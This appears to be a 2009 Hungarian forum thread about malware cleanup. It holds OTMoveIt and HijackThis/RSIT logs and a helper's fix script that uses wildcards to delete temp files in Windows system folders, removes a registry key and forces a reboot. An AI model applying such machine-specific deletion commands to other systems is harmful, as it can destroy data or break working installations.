File C:\DOCUME~1\Bence\LOCALS~1\Temp\JETCAC7.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo386 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo387 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo388 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo389 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo390 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo391 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo392 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo393 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo394 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo395 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo396 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo397 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo398 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo399 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo400 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo401 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo402 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo403 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo404 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo405 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo406 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo407 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo408 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo409 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo410 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo411 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo412 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo413 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo414 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo415 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo416 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo417 moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C3F.tmp not found!
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C55.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF677F.tmp moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFCFF3.tmp not found!
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFD009.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFF81F.tmp moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~ROMFN_00000F50 not found!
C:\WINDOWS\temp\KeyFocusKFWSMMFile.txt moved successfully.
File C:\WINDOWS\temp\Perflib_Perfdata_7d4.dat not found!
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\cache4\opr07CG2 moved successfully.


szomb. máj. 23, 2009 20:05
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
tolds le az OTMOVEIT3-programot,a baloldali ablakba masold be a piros textet-es KLIK-MOVEIT-a restart utan ted ide amit add,es
http://download.bleepingcomputer.com/ol ... oveIt3.exe

telepitsd fel a WMP-playerhoz codekokat.
http://www.pakblogger.com/windows-media-player-2009-codec-pack-play-all-media-formats-in-wmp/

Kód:
:processes
explorer.exe

:files
C:\WINDOWS\system32\*.tmp.dll /s
C:\WINDOWS\system32\SET*.tmp /s
C:\WINDOWS\*.tmp /s
C:\WINDOWS\system32\h323log.txt

:reg
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]

:commands
[purity]
[emptytemp]
[start explorer]
[Reboot]


szomb. máj. 23, 2009 16:12
Profil Privát üzenet küldése Honlap
ezüst tag

Csatlakozott: csüt. jún. 21, 2007 10:27
Hozzászólások: 92
Hozzászólás 
Na lefuttatam újra és van info.txt is!

log.txt:
Logfile of random's system information tool 1.06 (written by random/random)
Run by Zsombor at 2009-05-23 14:29:10
Microsoft Windows XP Home Edition Szervizcsomag 3
System drive C: has 68 GB (45%) free of 153 GB
Total RAM: 3070 MB (84% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 14:29:24, on 2009.05.23.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_1_3_0\RGSC.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Documents and Settings\Zsombor\Asztal\RSIT.exe
C:\Program Files\trend micro\Zsombor.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ZoneAlarm Spy Blocker BHO - {F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: ZoneAlarm Spy Blocker - {F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [RGSC] C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xportálás Microsoft Excel formátumba - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 0564585359
O17 - HKLM\System\CCS\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GtDetectSc - Option - C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Ahead Software AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: KF Web Server (KeyFocusWebServer) - Unknown owner - C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Pinnacle Systems Media Service (PinnacleSys.MediaServer) - Pinnacle Systems - C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: Fujitsu Siemens Computers Diagnostic Testhandler (TestHandler) - Fujitsu Siemens Computers - C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 8738 bytes

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-13 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
Adobe PDF Conversion Toolbar Helper - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-13 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-13 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA}]
ZoneAlarm Spy Blocker BHO - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - ZoneAlarm Spy Blocker - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"nwiz"=nwiz.exe /install []
"ZoneAlarm Client"=C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe [2008-08-21 981904]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2006-06-28 16248320]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-12-03 13680640]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-10-24 1451264]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe [2008-12-29 306088]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2007-10-18 5724184]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\InCD]
C:\Program Files\Ahead\InCD\InCD.exe [2004-02-10 1261672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
C:\Program Files\Messenger\msmsgs.exe [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
C:\Program Files\QuickTime\qttask.exe [2007-10-19 286720]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2006-05-23 402736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
UPnPMonitor - {e57ce738-33e8-4c51-8354-bb4de9d215d1} - C:\WINDOWS\system32\upnpui.dll [2008-04-14 239616]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe"="C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe:*:Enabled:Rockstar Games Social Club"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Totalcmd\TOTALCMD.EXE"="C:\Program Files\Totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit international version, file manager replacement for Windows"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
"C:\WINDOWS\system32\spoolsv.exe"="C:\WINDOWS\system32\spoolsv.exe:*:Enabled:Spooler SubSystem App"
"C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe:*:Enabled:hpofxm08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe"="C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe:*:Enabled:hposfx08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe"="C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe:*:Enabled:hpqscnvw.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe:*:Enabled:hpqcopy.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe:*:Enabled:hpzwiz01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe:*:Enabled:hpqnrs08.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMC.exe"="C:\Program Files\Pinnacle\MediaCenter\PMC.exe:LocalSubNet:Enabled:Pmc.exe"
"C:\Program Files\Pinnacle\MediaCenter\PSST.exe"="C:\Program Files\Pinnacle\MediaCenter\PSST.exe:LocalSubNet:Enabled:PSST.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe"="C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe:LocalSubNet:Enabled:PMSManager.exe"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe"="C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe:*:Enabled:Call of Duty(R) 4 - Modern Warfare(TM) "
"C:\Program Files\Messenger\msmsgs.exe"="C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe"="C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.1"
"C:\Program Files\LimeWire\LimeWire.exe"="C:\Program Files\LimeWire\LimeWire.exe:*:Enabled:LimeWire"
"C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe"="C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe:*:Enabled:kfwserv"
